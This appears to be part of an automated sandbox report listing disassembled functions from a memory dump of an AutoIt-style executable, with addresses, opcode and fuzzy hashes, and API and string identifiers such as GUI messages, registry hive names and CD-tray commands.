                                                                                                                    • Opcode Fuzzy Hash: 44e0bcb64cdb213a1ae13f0197e832722533c3c8cf9ea28823a7f9588fce5fb2
                                                                                                                    • Instruction Fuzzy Hash: 67428621D2DE4A85E2579F35EA116366365BF527D8F098333E80EF7650EF3EA44AC200
                                                                                                                    Function 00007FF656061A18 Relevance: .1, Instructions: 66COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c2308bd2b59363eb380d9f2aadf6ae7fcc9e74111fd97fe2ff68e231cb56cb52
                                                                                                                    • Instruction ID: 7c8c6b2b900e2e79b06bb7887a7303cbaf4cb4ccf90e71ce2a81c10d9ec2ac1b
                                                                                                                    • Opcode Fuzzy Hash: c2308bd2b59363eb380d9f2aadf6ae7fcc9e74111fd97fe2ff68e231cb56cb52
                                                                                                                    • Instruction Fuzzy Hash: 4221A173A2454186E708CF75D9626A933A5A364708F08C23AD62BD7284CE3EE909C740
                                                                                                                    Function 00007FF65601FD20 Relevance: .0, Instructions: 32COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                                                                    • Instruction ID: 87ef8d3d5622f33494ca68d9227be37b3493579c453a083cd6ee0b95bbae8613
                                                                                                                    • Opcode Fuzzy Hash: f4e4605b7b007d95894f61c83fec82003118576a017aad510c5c4214a882ee24
                                                                                                                    • Instruction Fuzzy Hash: 04F06271B182958AEBA4CF2CA98262977D0EB0C3C4F948439DA8DC3F44DE3D9064DF14
                                                                                                                    Function 00007FF6560059C8 Relevance: .0, Instructions: 2COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                                                                                    • Instruction ID: 1d564f41f22ee98f74de6db9dcf700bd559545c5fd4a8a86985f7bf712e24acd
                                                                                                                    • Opcode Fuzzy Hash: 06a18b8ad93dc8222913c3b18848eb7fe0d0fd2f3d8a242d5e2f0303cc3a2d96
                                                                                                                    • Instruction Fuzzy Hash: 17A0026590EC02D4E6068F01EB500302331EB50324B990432D10DE3461DF3EA488C310
                                                                                                                    Function 00007FF655FE2620 Relevance: 28.7, APIs: 19, Instructions: 201COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$LongWindow$ModeObjectStockText
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 554392163-0
                                                                                                                    • Opcode ID: 75ec6bcd28a8efb3125b08e197a7caecd4c99aa61c3caa47667afd5c8d51fa7a
                                                                                                                    • Instruction ID: 9ac01737572e2886957d3a5064a061064250d16255f58ea532fe0e552edde95f
                                                                                                                    • Opcode Fuzzy Hash: 75ec6bcd28a8efb3125b08e197a7caecd4c99aa61c3caa47667afd5c8d51fa7a
                                                                                                                    • Instruction Fuzzy Hash: 3081D925D0C55781EA719B29D94C27D2392FF86B68F5D0231C95EA36E4EE3DEC4ACB00
                                                                                                                    Function 00007FF65605C81C Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 140COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcscat$FileInfoQueryValueVersion$Sizewcscpywcsstr
                                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                    • API String ID: 222038402-1459072770
                                                                                                                    • Opcode ID: 8c755c0fc64d6d4bda2231876f2c678180d8bec7320acdc058a860b754f6bdd3
                                                                                                                    • Instruction ID: c5c97df023d417e1de207c1e006e33d00cd4439df2480827307aa37b7eb457ae
                                                                                                                    • Opcode Fuzzy Hash: 8c755c0fc64d6d4bda2231876f2c678180d8bec7320acdc058a860b754f6bdd3
                                                                                                                    • Instruction Fuzzy Hash: 8A51AF2570C64282EE58EB2296101BD6391FF85FE4F888535ED0DA7B96DF3EE50AC704
                                                                                                                    Function 00007FF656086608 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 475windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                    • API String ID: 3974292440-4258414348
                                                                                                                    • Opcode ID: 3f2e69d4aa51dbb406168e8eec17f7dda2e2331c7f002e480690ed7ff1453b94
                                                                                                                    • Instruction ID: 9e67bdf251ee44a0d70bf77bdc2b70c935323e3309e12b6600849e9fbe086df8
                                                                                                                    • Opcode Fuzzy Hash: 3f2e69d4aa51dbb406168e8eec17f7dda2e2331c7f002e480690ed7ff1453b94
                                                                                                                    • Instruction Fuzzy Hash: 74122617B2865382EE50DF25C9055BD67A0AF54F94B4E4632DE4DE73A1EE3EE889C300
                                                                                                                    Function 00007FF656091254 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162windowfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                    • API String ID: 2091158083-3440237614
                                                                                                                    • Opcode ID: 7c2f099bf0a5769a0aea507f3e3fb0e9d810cef93c6a9b2b7ff31669fef11a09
                                                                                                                    • Instruction ID: 5f37b9d3b24194eb5e93d848a221a93a0652501acc7d0829ff64b161e83339db
                                                                                                                    • Opcode Fuzzy Hash: 7c2f099bf0a5769a0aea507f3e3fb0e9d810cef93c6a9b2b7ff31669fef11a09
                                                                                                                    • Instruction Fuzzy Hash: B171C636718A8296E750DF15E8447ED7721FB84B98F840032EE4EA3A99CF7DD549CB00
                                                                                                                    Function 00007FF656063FD0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 197COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: SendString$BuffCharDriveLowerType
                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                    • API String ID: 1600147383-4113822522
                                                                                                                    • Opcode ID: c97716080e4f543c9a20482f6ee2b28a1c64bce64f7816063184408ee6a3b085
                                                                                                                    • Instruction ID: 1fd951f7e77224f42958ce54025c6a1d91b38aaed4fb408c36dfc6c39795075e
                                                                                                                    • Opcode Fuzzy Hash: c97716080e4f543c9a20482f6ee2b28a1c64bce64f7816063184408ee6a3b085
                                                                                                                    • Instruction Fuzzy Hash: 2F81A122B14A5385EB909B65D9542BC33B1FB54B88B588531CE0EE7B95DF3ED98AC300
                                                                                                                    Function 00007FF656090118 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 175windowlibraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Load$Image$IconLibraryMessageSend_invalid_parameter_noinfo$DestroyExtractFree
                                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                                    • API String ID: 258715311-1154884017
                                                                                                                    • Opcode ID: e03b8a297f3e31543187ea4d980dcab107f3fc290ba37e0d0746b7471e731d00
                                                                                                                    • Instruction ID: 67b63547005cd4555eef9e08134258ff8a42ab17a8603691ae3250b00ff03df8
                                                                                                                    • Opcode Fuzzy Hash: e03b8a297f3e31543187ea4d980dcab107f3fc290ba37e0d0746b7471e731d00
                                                                                                                    • Instruction Fuzzy Hash: A971C632A04B5282EB648F22D544A7A23A5FF44F9CF484636ED1E977A4DF3ED449C300
                                                                                                                    Function 00007FF6560903D0 Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3840717409-0
                                                                                                                    • Opcode ID: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
                                                                                                                    • Instruction ID: caf52a328ca7dfad25c6793f84c5269330c2c7111b5b2c4fb023c84029184816
                                                                                                                    • Opcode Fuzzy Hash: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
                                                                                                                    • Instruction Fuzzy Hash: 2D519936B15B01C6EB14CF62E914A6E33A2FB88B98B584135EE1E93B14DF3ED409C700
                                                                                                                    Function 00007FF656060D70 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 388COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                    • API String ID: 2610073882-3931177956
                                                                                                                    • Opcode ID: 8b012b72d9182424534d163227db5c9d184644b7672044e55a9e6dfc6ab7007a
                                                                                                                    • Instruction ID: 7914d7b36056632ec3e63051b01525eee3a3f27de35a706d0d018fb9d7c81792
                                                                                                                    • Opcode Fuzzy Hash: 8b012b72d9182424534d163227db5c9d184644b7672044e55a9e6dfc6ab7007a
                                                                                                                    • Instruction Fuzzy Hash: F2028D32A0865285FE699F69C39417D63A1FF05B84F4D4635CA0FA7A94DF3EE998C300
                                                                                                                    Function 00007FF65606246C Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 281fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Filewcscat$DeleteTemp$NamePath_fread_nolock_invalid_parameter_noinfowcscpy
                                                                                                                    • String ID: aut
                                                                                                                    • API String ID: 130057722-3010740371
                                                                                                                    • Opcode ID: 587d8ff44f56b4c982e82ef7faa21eb4bcf6eabd1a57bd80e25ab706fdae8aa1
                                                                                                                    • Instruction ID: 1bb861aa7348755c1f9ba66023983f4ccdbe7f7d2fe2a63ce57129e04bcee79c
                                                                                                                    • Opcode Fuzzy Hash: 587d8ff44f56b4c982e82ef7faa21eb4bcf6eabd1a57bd80e25ab706fdae8aa1
                                                                                                                    • Instruction Fuzzy Hash: 87C1B236618AC686EB30DF25E9406ED6360FB85B8CF444036EA8DA7B59DF7DD249C700
                                                                                                                    Function 00007FF65608E40C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 177windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopRect
                                                                                                                    • String ID: tooltips_class32
                                                                                                                    • API String ID: 2443926738-1918224756
                                                                                                                    • Opcode ID: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
                                                                                                                    • Instruction ID: d94cbddf7069b9d8f1fee99ff81dac6662b93b1161f583b2dc88fe3e38db7741
                                                                                                                    • Opcode Fuzzy Hash: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
                                                                                                                    • Instruction Fuzzy Hash: 43918936A18B8586EB50CF65E5547AD33B1EB88B88F584036DE4EA7B68DF3DD049C700
                                                                                                                    Function 00007FF656074F54 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 151windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2598888154-3916222277
                                                                                                                    • Opcode ID: 3994b7b28fef36ee27ebe09cd9ee49426cf7ca29f8cb3ed20e9a9f0582733bf5
                                                                                                                    • Instruction ID: 3740e2d694656b232e4bd5daa1848731849e61f71119853f751928234ebc365f
                                                                                                                    • Opcode Fuzzy Hash: 3994b7b28fef36ee27ebe09cd9ee49426cf7ca29f8cb3ed20e9a9f0582733bf5
                                                                                                                    • Instruction Fuzzy Hash: 77516776B15681CFE750CF66E540AAE77B1F748B88F048525EE4AA3B18CF39E419CB40
                                                                                                                    Function 00007FF65604B0C4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 117memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                    • API String ID: 2706829360-2785691316
                                                                                                                    • Opcode ID: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                                                                    • Instruction ID: dc64c3655739e6f56926ce15c3b551835414feb12e327fc793e5d1bd77e89a9c
                                                                                                                    • Opcode Fuzzy Hash: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                                                                    • Instruction Fuzzy Hash: 1E519232B25A1289EB10EF65DA846BD3371FB94B89F484031DE0EA3665CF7AD44DC300
                                                                                                                    Function 00007FF656081110 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 371COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF65607FD7B), ref: 00007FF656081143
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpper
                                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                    • API String ID: 3964851224-909552448
